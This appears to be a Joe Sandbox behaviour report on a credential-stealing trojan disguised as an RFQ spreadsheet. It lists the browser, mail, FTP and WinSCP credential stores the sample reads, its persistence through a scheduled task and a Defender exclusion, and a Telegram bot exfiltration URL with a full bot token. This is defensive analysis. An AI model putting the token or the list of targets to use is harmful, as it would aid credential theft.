                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeQueries volume information: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3bdb0e8.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ywKDUBCUA.exe.43ebdd0.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ywKDUBCUA.exe.43b11b0.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ywKDUBCUA.exe.43ebdd0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.ywKDUBCUA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ywKDUBCUA.exe.43b11b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3bdb0e8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.2104193964.00000000043B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3268439480.0000000003262000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.3268715008.0000000002D02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.3268715008.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3268439480.000000000327D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2064422472.00000000044C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.3264244060.0000000000436000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3268439480.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.3268715008.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2064422472.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RFQ-101432620247fl#U00e2#U00aexslx.exe PID: 3964, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RFQ-101432620247fl#U00e2#U00aexslx.exe PID: 6224, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ywKDUBCUA.exe PID: 2260, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ywKDUBCUA.exe PID: 7448, type: MEMORYSTR
Source: Yara match | File source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3bdb0e8.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ywKDUBCUA.exe.43ebdd0.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ywKDUBCUA.exe.43b11b0.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ywKDUBCUA.exe.43ebdd0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.ywKDUBCUA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ywKDUBCUA.exe.43b11b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3bdb0e8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.2104193964.00000000043B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2064422472.00000000044C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3268439480.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.3268715008.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2064422472.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RFQ-101432620247fl#U00e2#U00aexslx.exe PID: 3964, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RFQ-101432620247fl#U00e2#U00aexslx.exe PID: 6224, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ywKDUBCUA.exe PID: 2260, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ywKDUBCUA.exe PID: 7448, type: MEMORYSTR
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match | File source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3bdb0e8.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ywKDUBCUA.exe.43ebdd0.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ywKDUBCUA.exe.43b11b0.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ywKDUBCUA.exe.43ebdd0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.ywKDUBCUA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ywKDUBCUA.exe.43b11b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3bdb0e8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.2104193964.00000000043B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2064422472.00000000044C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.3264244060.0000000000436000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3268439480.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.3268715008.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2064422472.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RFQ-101432620247fl#U00e2#U00aexslx.exe PID: 3964, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RFQ-101432620247fl#U00e2#U00aexslx.exe PID: 6224, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ywKDUBCUA.exe PID: 2260, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ywKDUBCUA.exe PID: 7448, type: MEMORYSTR

                      Remote Access Functionality

Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3bdb0e8.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ywKDUBCUA.exe.43ebdd0.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ywKDUBCUA.exe.43b11b0.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ywKDUBCUA.exe.43ebdd0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.ywKDUBCUA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ywKDUBCUA.exe.43b11b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3bdb0e8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.2104193964.00000000043B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3268439480.0000000003262000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.3268715008.0000000002D02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.3268715008.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3268439480.000000000327D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2064422472.00000000044C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.3264244060.0000000000436000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3268439480.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.3268715008.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2064422472.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RFQ-101432620247fl#U00e2#U00aexslx.exe PID: 3964, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RFQ-101432620247fl#U00e2#U00aexslx.exe PID: 6224, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ywKDUBCUA.exe PID: 2260, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ywKDUBCUA.exe PID: 7448, type: MEMORYSTR
Source: Yara match | File source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3bdb0e8.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ywKDUBCUA.exe.43ebdd0.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ywKDUBCUA.exe.43b11b0.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ywKDUBCUA.exe.43ebdd0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.ywKDUBCUA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ywKDUBCUA.exe.43b11b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3bdb0e8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.2104193964.00000000043B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2064422472.00000000044C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3268439480.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.3268715008.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2064422472.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RFQ-101432620247fl#U00e2#U00aexslx.exe PID: 3964, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RFQ-101432620247fl#U00e2#U00aexslx.exe PID: 6224, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ywKDUBCUA.exe PID: 2260, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ywKDUBCUA.exe PID: 7448, type: MEMORYSTR
[MITRE ATT&CK matrix. Tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact.]
[Techniques shown with a match count for this sample: Windows Management Instrumentation; DLL Side-Loading; Disable or Modify Tools; OS Credential Dumping; File and Directory Discovery; Archive Collected Data; Web Service; Scheduled Task/Job; Process Injection; Deobfuscate/Decode Files or Information; Input Capture; System Information Discovery; Data from Local System; Encrypted Channel; Obfuscated Files or Information; Credentials in Registry; Query Registry; Email Collection; Non-Application Layer Protocol; Software Packing; Security Software Discovery; Application Layer Protocol; Process Discovery; Clipboard Data; Masquerading; Virtualization/Sandbox Evasion; Application Window Discovery.]
Behavior Graph ID: 1445865 | Sample: RFQ-101432620247fl#U00e2#U0... | Startdate: 22/05/2024 | Architecture: WINDOWS | Score: 100
Top-level signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 13 other signatures
DNS/IP: api.telegram.org (Uses the Telegram API (likely for C&C communication))
Process tree (numbers after a process name are the badge values as shown on the graph):
• RFQ-101432620247fl#U00e2#U00aexslx.exe 7 (started)
  - dropped: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe, PE32
  - dropped: C:\Users\user\AppData\Local\...\tmp9347.tmp, XML
  - signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Uses schtasks.exe or at.exe to add and modify task schedules; Adds a directory exclusion to Windows Defender
  - RFQ-101432620247fl#U00e2#U00aexslx.exe 15 2 (started)
    - DNS/IP: api.telegram.org 149.154.167.220, 443, 49709, 49712 TELEGRAMRU United Kingdom
    - signature: Installs a global keyboard hook
  - powershell.exe 23 (started)
    - signature: Loading BitLocker PowerShell Module
    - conhost.exe (started)
    - WmiPrvSE.exe (started)
  - powershell.exe 23 (started)
    - conhost.exe (started)
  - schtasks.exe 1 (started)
    - conhost.exe (started)
• ywKDUBCUA.exe 5 (started)
  - signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
  - ywKDUBCUA.exe (started)
    - signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)
  - schtasks.exe (started)
    - conhost.exe (started)
  - ywKDUBCUA.exe (started)
  - ywKDUBCUA.exe (started)

Source | Detection | Scanner | Label
RFQ-101432620247fl#U00e2#U00aexslx.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.Negasteal
RFQ-101432620247fl#U00e2#U00aexslx.exe | 100% | Avira | TR/AVI.PWS.Agent.apilj
RFQ-101432620247fl#U00e2#U00aexslx.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | 100% | Avira | TR/AVI.PWS.Agent.apilj
C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.Negasteal
                      No Antivirus matches
                      No Antivirus matches
Source | Detection | Scanner | Label
https://account.dyn.com/ | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | 0% | URL Reputation | safe
https://api.telegram.org/bot7156462915:AAE3EIUy20eRSFdNZcqhQa0y1tAvt8IT_oY/sendDocument | 0% | Avira URL Cloud | safe
https://api.telegram.org | 0% | Avira URL Cloud | safe
http://api.telegram.org | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot7156462915:AAE3EIUy20eRSFdNZcqhQa0y1tAvt8IT_oY/ | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.telegram.org | 149.154.167.220 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot7156462915:AAE3EIUy20eRSFdNZcqhQa0y1tAvt8IT_oY/sendDocument | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://account.dyn.com/ | RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000000.00000002.2064422472.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000000.00000002.2064422472.00000000044C2000.00000004.00000800.00020000.00000000.sdmp, ywKDUBCUA.exe, 0000000A.00000002.2104193964.00000000043B1000.00000004.00000800.00020000.00000000.sdmp, ywKDUBCUA.exe, 00000010.00000002.3264244060.0000000000436000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org | RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000009.00000002.3268439480.000000000326A000.00000004.00000800.00020000.00000000.sdmp, ywKDUBCUA.exe, 00000010.00000002.3268715008.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://api.telegram.org | RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000009.00000002.3268439480.000000000327D000.00000004.00000800.00020000.00000000.sdmp, ywKDUBCUA.exe, 00000010.00000002.3268715008.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000000.00000002.2063886948.00000000028CA000.00000004.00000800.00020000.00000000.sdmp, RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000009.00000002.3268439480.000000000326A000.00000004.00000800.00020000.00000000.sdmp, ywKDUBCUA.exe, 0000000A.00000002.2102960401.00000000030DA000.00000004.00000800.00020000.00000000.sdmp, ywKDUBCUA.exe, 00000010.00000002.3268715008.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | RFQ-101432620247fl#U00e2#U00aexslx.exe, ywKDUBCUA.exe.0.dr | false | URL Reputation: safe | unknown
https://api.telegram.org/bot7156462915:AAE3EIUy20eRSFdNZcqhQa0y1tAvt8IT_oY/ | RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000000.00000002.2064422472.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000000.00000002.2064422472.00000000044C2000.00000004.00000800.00020000.00000000.sdmp, RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000009.00000002.3268439480.0000000003211000.00000004.00000800.00020000.00000000.sdmp, ywKDUBCUA.exe, 0000000A.00000002.2104193964.00000000043B1000.00000004.00000800.00020000.00000000.sdmp, ywKDUBCUA.exe, 00000010.00000002.3264244060.0000000000434000.00000040.00000400.00020000.00000000.sdmp, ywKDUBCUA.exe, 00000010.00000002.3268715008.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1445865
                        Start date and time:2024-05-22 17:26:04 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 8m 33s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:20
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:RFQ-101432620247fl#U00e2#U00aexslx.exe
                        renamed because original name is a hash value
                        Original Sample Name:RFQ-101432620247flxslx.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@23/15@1/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 99%
                        • Number of executed functions: 152
                        • Number of non-executed functions: 13
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtCreateKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                        • VT rate limit hit for: RFQ-101432620247fl#U00e2#U00aexslx.exe
Time | Type | Description
11:26:53 | API Interceptor | 1774726x Sleep call for process: RFQ-101432620247fl#U00e2#U00aexslx.exe modified
11:26:54 | API Interceptor | 47x Sleep call for process: powershell.exe modified
11:26:57 | API Interceptor | 1031314x Sleep call for process: ywKDUBCUA.exe modified
17:26:55 | Task Scheduler | Run new task: ywKDUBCUA path: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe
Match | Associated Sample Name / URL | Detection | Threat Name
149.154.167.220 | QUOTATION SHEET_RFQ 564077 2024.5.17.exe | malicious | AgentTesla
149.154.167.220 | MSK203.exe | malicious | GuLoader
149.154.167.220 | New Voicemail Invoice 64746w .js | malicious | WSHRAT
149.154.167.220 | gtKVgxrJ22.exe | malicious | Gurcu Stealer, WhiteSnake Stealer
149.154.167.220 | Pg5dhIO92K.exe | malicious | AgentTesla
149.154.167.220 | Shipping Reference_AWB 703280542_INVOICE_PDF.exe | malicious | AgentTesla
149.154.167.220 | 4289397_SEA SHIPMENT.exe | malicious | AgentTesla
149.154.167.220 | PAYMENT COPY 02521.exe | malicious | AgentTesla, PureLog Stealer, XWorm
149.154.167.220 | ERsg2wzaD4.exe | malicious | DCRat, PureLog Stealer, zgRAT
149.154.167.220 | Yehir Hastanesi scan00100_PDF.exe | malicious | AgentTesla, PureLog Stealer, zgRAT
Match | Associated Sample Name / URL | Detection | Threat Name | Context
api.telegram.org | QUOTATION SHEET_RFQ 564077 2024.5.17.exe | malicious | AgentTesla | 149.154.167.220
api.telegram.org | MSK203.exe | malicious | GuLoader | 149.154.167.220
api.telegram.org | New Voicemail Invoice 64746w .js | malicious | WSHRAT | 149.154.167.220
api.telegram.org | gtKVgxrJ22.exe | malicious | Gurcu Stealer, WhiteSnake Stealer | 149.154.167.220
api.telegram.org | Pg5dhIO92K.exe | malicious | AgentTesla | 149.154.167.220
api.telegram.org | Shipping Reference_AWB 703280542_INVOICE_PDF.exe | malicious | AgentTesla | 149.154.167.220
api.telegram.org | 4289397_SEA SHIPMENT.exe | malicious | AgentTesla | 149.154.167.220
api.telegram.org | PAYMENT COPY 02521.exe | malicious | AgentTesla, PureLog Stealer, XWorm | 149.154.167.220
api.telegram.org | ERsg2wzaD4.exe | malicious | DCRat, PureLog Stealer, zgRAT | 149.154.167.220
api.telegram.org | Yehir Hastanesi scan00100_PDF.exe | malicious | AgentTesla, PureLog Stealer, zgRAT | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | QUOTATION SHEET_RFQ 564077 2024.5.17.exe | malicious | AgentTesla | 149.154.167.220
TELEGRAMRU | MSK203.exe | malicious | GuLoader | 149.154.167.220
TELEGRAMRU | New Voicemail Invoice 64746w .js | malicious | WSHRAT | 149.154.167.220
TELEGRAMRU | https://scandal-lucah-melayu-viral.group-telegram.my.id/ | malicious | Unknown | 149.154.167.99
TELEGRAMRU | https://danakaget.uniclodw.web.id/ | malicious | Unknown | 149.154.164.13
TELEGRAMRU | https://teiegeram-hk.com/ | malicious | Unknown | 149.154.167.99
TELEGRAMRU | gtKVgxrJ22.exe | malicious | Gurcu Stealer, WhiteSnake Stealer | 149.154.167.220
TELEGRAMRU | https://rentry.co/webitokt/raw | malicious | Unknown | 149.154.167.99
TELEGRAMRU | Pg5dhIO92K.exe | malicious | AgentTesla | 149.154.167.220
TELEGRAMRU | Shipping Reference_AWB 703280542_INVOICE_PDF.exe | malicious | AgentTesla | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | SOA_41457.exe | malicious | AgentTesla | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | QUOTATION SHEET_RFQ 564077 2024.5.17.exe | malicious | AgentTesla | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | INSTALLATION BOQ KATSINA.exe | malicious | AgentTesla | 149.154.167.220
